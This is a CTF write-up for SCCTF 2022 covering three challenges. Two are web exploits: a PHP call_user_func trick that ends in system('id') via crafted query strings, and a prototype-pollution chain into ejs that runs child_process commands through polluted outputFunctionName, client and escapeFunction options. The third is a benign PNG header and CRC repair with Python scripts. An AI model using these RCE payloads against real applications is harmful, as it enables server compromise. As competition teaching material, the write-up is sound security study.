NS - SCCTF 2022

A look at the provincial competition.

morefile

It's a trick; the code is as follows:

<?php
error_reporting(E_ALL); // report everything
ini_set('display_errors', 'On');
$action = $_GET['action'];
$parameters = $_GET;
var_dump($parameters);
if (isset($parameters['action'])) {
unset($parameters['action']);
}
var_dump($parameters);
call_user_func($action, $parameters);


if(count(glob(__DIR__.'/*'))>6){
call_user_func($action, ...$parameters);
}
show_source(__FILE__);
?>

Hit it twice. The first request, `session_start` with `save_path=/var/www/`, hands `['save_path' => '/var/www/']` to `session_start()` as its options array, so PHP creates a `sess_*` file in the web root (assumed here to be `__DIR__`) and the `glob()` count climbs past 6. The second request reaches the spread call: `$parameters` is `[1 => 'id']`, an integer key is unpacked positionally, and the call becomes `system('id')`. The key has to be an integer, since a string key is rejected before PHP 8.0 and treated as a named argument from 8.0 on. One caveat: the un-spread `call_user_func('system', $parameters)` above it passes an array to `system()`, which is only a warning on PHP 7 but a `TypeError` on PHP 8 that would stop the script before the spread call. The exp is as follows:

1. ?action=session_start&save_path=/var/www/
2. ?action=system&1=id

eznode

keyd < 1.4.3 prototype pollution, chained into an ejs RCE.
Firing this exp first throws `Error: outputFunctionName is not a valid JS identifier.`: since 3.1.7 ejs checks that option against an identifier regex before splicing it into the generated template source, so the classic `outputFunctionName` gadget no longer works.

{
"username":"admin",
"password":"password",
"que":"__proto__.__proto__.outputFunctionName",
"anser":"_tmp1;global.process.mainModule.require('child_process').exec('calc');var __tmp2"
}

OK, switch to the two-step version. Polluting `client` to `true` makes ejs prepend `escapeFn = escapeFn || ` + `escapeFn.toString()` to the compiled template source, and `escapeFn` is `opts.escapeFunction` when that option is present. With `escapeFunction` polluted to a string, `.toString()` returns the string itself, so the `1; return ...` payload lands directly in the generated function and runs on the next render. Both values only need to be on the prototype before a template is rendered:

1. 
{
"username":"admin",
"password":"password",
"que":"__proto__.__proto__.client",
"anser":"true"
}
2.
{
"username":"admin",
"password":"password",
"que":"__proto__.__proto__.escapeFunction",
"anser":"1; return global.process.mainModule.constructor._load('child_process').execSync('open -a /System/Applications/Calculator.app')"
}

findme

Repair the PNG; first recover the width and height. The IHDR CRC covers the chunk type plus its 13-byte body, so when only the width/height fields were edited the stored CRC still identifies the original values and can be brute-forced:

import zlib
import struct
import argparse
import itertools


parser = argparse.ArgumentParser()
parser.add_argument("-f", type=str, default=None, required=True,
                    help="name of the image in the current directory")
args = parser.parse_args()


bin_data = open(args.f, 'rb').read()
crc32key = zlib.crc32(bin_data[12:29])            # CRC over chunk type "IHDR" + 13-byte body
original_crc32 = int(bin_data[29:33].hex(), 16)   # CRC stored in the file


if crc32key == original_crc32:                    # recomputed CRC matches the stored one
    print('Width/height are fine!')
else:
    input_ = input("Width/height were changed; brute-force them via CRC? (Y/n):")
    if input_ not in ["Y", "y", ""]:
        exit()
    else:
        # In theory the range is 0xFFFFFFFF, but given real screens/CPU, 0x0FFF is enough: 4095 for width and height
        for i, j in itertools.product(range(4095), range(4095)):
            data = bin_data[12:16] + struct.pack('>i', i) + struct.pack('>i', j) + bin_data[24:29]
            crc32 = zlib.crc32(data)
            # CRC of the IHDR for size i:j compared with the stored CRC; a match fixes the size
            if(crc32 == original_crc32):
                print(f"\nCRC32: {hex(original_crc32)}")
                print(f"Width: {i}, hex: {hex(i)}")
                print(f"Height: {j}, hex: {hex(j)}")
                exit(0)


# CRC32: 0x928f61d7
# Width: 1217, hex: 0x4c1
# Height: 797, hex: 0x31d

Open the file in 010 Editor and restore the length fields of the affected chunks (gAMA is 4 bytes, sRGB 1, pHYs 9); see https://ctf-wiki.org/misc/picture/png/. A normal PNG for reference looks like this:

File: sctf.png (1421461 bytes)
chunk IHDR at offset 0x0000c, length 13
1000 x 562 image, 32-bit RGB+alpha, non-interlaced
chunk sRGB at offset 0x00025, length 1
rendering intent = perceptual
chunk gAMA at offset 0x00032, length 4: 0.45455
chunk pHYs at offset 0x00042, length 9: 3780x3780 pixels/meter (96 dpi)
chunk IDAT at offset 0x00057, length 65445
zlib: deflated, 32K window, fast compression
chunk IDAT at offset 0x10008, length 65524
...
chunk IDAT at offset 0x150008, length 45027
chunk IDAT at offset 0x15aff7, length 138
chunk IEND at offset 0x15b08d, length 0
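Putting both repair steps together, here is an added Python script (not the solve script above and not the challenge file) that walks the chunk list, recovers a tampered length field from the CRC that follows the chunk body, and falls back to the same width/height brute force for IHDR. The sample PNG is constructed inside the script so it runs offline; `tamper()` applies the same edits the challenge did (wrong IHDR dimensions, wrong length fields on sRGB/gAMA/pHYs) to that sample.

```python
"""PNG chunk walker that repairs bogus length fields and brute-forces IHDR dimensions.
Added example; the sample image is constructed below, not taken from the challenge."""
import itertools
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
# Chunk types whose body size is fixed by the spec; a wrong length on these needs no search.
FIXED_LENGTHS = {b"IHDR": 13, b"sRGB": 1, b"gAMA": 4, b"pHYs": 9, b"IEND": 0}


def chunk(ctype, body):
    """Serialise one chunk: 4-byte big-endian length, type, body, CRC32 over type+body."""
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", zlib.crc32(ctype + body))


def build_png(width, height, rows):
    """Constructed 8-bit RGBA PNG with the same chunk layout as the reference listing above."""
    raw = b"".join(b"\x00" + row for row in rows)  # filter type 0 in front of every scanline
    return PNG_SIG + b"".join([
        chunk(b"IHDR", struct.pack(">IIBBBBB", width, height, 8, 6, 0, 0, 0)),
        chunk(b"sRGB", b"\x00"),
        chunk(b"gAMA", struct.pack(">I", 45455)),
        chunk(b"pHYs", struct.pack(">IIB", 3780, 3780, 1)),
        chunk(b"IDAT", zlib.compress(raw)),
        chunk(b"IEND", b""),
    ])


def stored_crc(data, pos, length):
    """The CRC field sits right after the body, so its offset depends on the body length."""
    return int.from_bytes(data[pos + 8 + length:pos + 12 + length], "big")


def recover_length(data, pos):
    """Find the body length whose trailing 4 bytes equal CRC32(type + body); None if none fits."""
    declared = struct.unpack(">I", data[pos:pos + 4])[0]
    ctype = data[pos + 4:pos + 8]
    candidates = [declared] + ([FIXED_LENGTHS[ctype]] if ctype in FIXED_LENGTHS else [])
    for ln in candidates:
        if pos + 12 + ln <= len(data) and zlib.crc32(ctype + data[pos + 8:pos + 8 + ln]) == stored_crc(data, pos, ln):
            return ln
    if ctype in FIXED_LENGTHS:
        return FIXED_LENGTHS[ctype]  # length is known; the CRC fails because the body was edited (IHDR case)
    running = zlib.crc32(ctype)      # unknown-size chunk (IDAT, tEXt, ...): incremental CRC scan, O(n)
    for ln in range(0, len(data) - pos - 12 + 1):
        if running == stored_crc(data, pos, ln):
            return ln
        running = zlib.crc32(data[pos + 8 + ln:pos + 9 + ln], running)
    return None


def bruteforce_ihdr(body, target_crc, max_dim=4095):
    """Same search as the solve script above, but over an IHDR body rather than a file offset."""
    prefix_crc = zlib.crc32(b"IHDR")
    tail = body[8:]  # bit depth, colour type, compression, filter, interlace stay as found
    for w, h in itertools.product(range(1, max_dim + 1), repeat=2):
        if zlib.crc32(struct.pack(">II", w, h) + tail, prefix_crc) == target_crc:
            return w, h
    raise ValueError("no width/height up to max_dim reproduces the IHDR CRC")


def repair_png(data, max_dim=4095):
    """Return (repaired bytes, list of fixes applied); raise if a chunk cannot be recovered."""
    if data[:8] != PNG_SIG:
        raise ValueError("missing PNG signature")
    out, log, pos = bytearray(PNG_SIG), [], 8
    while pos + 12 <= len(data):
        declared = struct.unpack(">I", data[pos:pos + 4])[0]
        ctype = data[pos + 4:pos + 8]
        length = recover_length(data, pos)
        if length is None:
            raise ValueError(f"cannot recover length of {ctype!r} at {pos:#x}")
        if length != declared:
            log.append(f"{ctype.decode()} @ {pos:#x}: length {declared} -> {length}")
        body = data[pos + 8:pos + 8 + length]
        crc = stored_crc(data, pos, length)
        if ctype == b"IHDR" and zlib.crc32(ctype + body) != crc:
            w, h = bruteforce_ihdr(body, crc, max_dim)
            log.append(f"IHDR @ {pos:#x}: width/height -> {w}x{h} (CRC {crc:#x})")
            body = struct.pack(">II", w, h) + body[8:]
        elif zlib.crc32(ctype + body) != crc:
            raise ValueError(f"{ctype!r} at {pos:#x}: CRC mismatch, body was modified")
        out += struct.pack(">I", length) + ctype + body + crc.to_bytes(4, "big")
        pos += 12 + length
        if ctype == b"IEND":
            break
    return bytes(out), log


def tamper(png):
    """Apply the challenge's edits to the constructed sample: wrong IHDR width/height,
    wrong length fields on sRGB/gAMA/pHYs, every CRC left untouched."""
    buf = bytearray(png)
    buf[16:24] = struct.pack(">II", 1000, 562)  # width/height live at offset 16 of the file
    pos = 8
    while pos < len(buf):
        ln = struct.unpack(">I", buf[pos:pos + 4])[0]
        if bytes(buf[pos + 4:pos + 8]) in (b"sRGB", b"gAMA", b"pHYs"):
            buf[pos:pos + 4] = struct.pack(">I", ln + 7)
        pos += 12 + ln
    return bytes(buf)


def demo():
    """Build a 7x5 sample, tamper it, repair it; returns (repair matched original, fix log)."""
    rows = [bytes(range(i, i + 28)) for i in range(5)]  # 7 RGBA pixels per row, constructed
    original = build_png(7, 5, rows)
    fixed, log = repair_png(tamper(original))
    return fixed == original, log


if __name__ == "__main__":
    ok, log = demo()
    print("repaired bytes match original:", ok)
    print("\n".join(log))
```

On a real file replace `demo()` with `repair_png(open(path, "rb").read())` and write the first element of the result out. Length recovery trusts the stored CRC, so a chunk whose CRC was also edited is reported as a mismatch rather than silently "fixed", and the IHDR brute force only makes sense when the bytes after width/height are still the original ones.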